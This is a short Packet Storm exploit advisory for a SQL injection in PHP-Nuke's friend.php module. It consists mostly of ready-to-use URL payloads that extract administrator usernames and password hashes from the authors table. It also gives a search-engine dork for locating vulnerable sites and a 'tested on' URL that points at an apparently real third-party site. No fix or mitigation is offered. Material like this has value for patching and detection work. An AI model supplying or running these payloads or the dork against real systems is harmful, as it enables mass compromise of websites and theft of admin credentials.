PHP-Nuke Friend SQL Injection

2010-05-07T00:00:00
ID PACKETSTORM:89258
Type packetstorm
Reporter CMD
Modified 2010-05-07T00:00:00

Description

                                        
                                            `  
  
  
  
# Exploit Title: [PHP-Nuke 'friend.php' Module Remote SQL Injection]  
# Date: [05.05.2010]  
# Author: [CMD]  
# Contact : cemede@ilkposta.com  
# Version: [all version]  
  
=-==-==-==-==-==-==-==C==M==D==-==-==-==-==-==-==-==-==-==-==-=  
# Tested on: [http://www.astreet.com/friend.php?op=FriendSend&sid=392/**/and/**/1=0/**/union/**/select/**/group_concat%28aid,0x3a,pwd%29/**/from/**/authors/**/where/**/radminsuper=1/*]  
  
=-==-==-==-==-==-==-==C==M==D==-==-==-==-==-==-==-==-==-==-==-=  
# Code : [/**/and/**/1=0/**/union/**/select/**/group_concat(aid,0x3a,pwd)/**/from/**/authors/*]  
  
=-==-==-==-==-==-==-==C==M==D==-==-==-==-==-==-==-==-==-==-==-=  
# Dork : inurl:friend.php?op=FriendSend  
  
=-==-==-==-==-==-==-==C==M==D==-==-==-==-==-==-==-==-==-==-==-=  
Example1: www.target.com/friend.php?op=FriendSend&sid=392/**/and/**/1=0/**/union/**/select/**/group_concat(aid,0x3a,pwd)/**/from/**/authors/**/where/**/radminsuper=1/*  
Example1: www.target.com/friend.php?op=FriendSend&sid=392/**/and/**/1=0/**/union/**/select/**/group_concat(aid,0x3a,pwd)/**/from/**/nuke_authors/**/where/**/radminsuper=1/*  
=-==-==-==-==-==-==-==C==M==D==-==-==-==-==-==-==-==-==-==-==-=  
  
# Th@nks : AmeN, MUS4LLAT, Kayahan, Sinaritx, JacKaL, Qasım, Metrp0l, Despot...  
  
# Says : Hemso bak bi dene bug daha xD ...   
_________________________________________________________________  
Yeni Windows 7: Gündelik işlerinizi basitleştirin. Size en uygun bilgisayarı bulun.  
http://windows.microsoft.com/shop  
  
  
`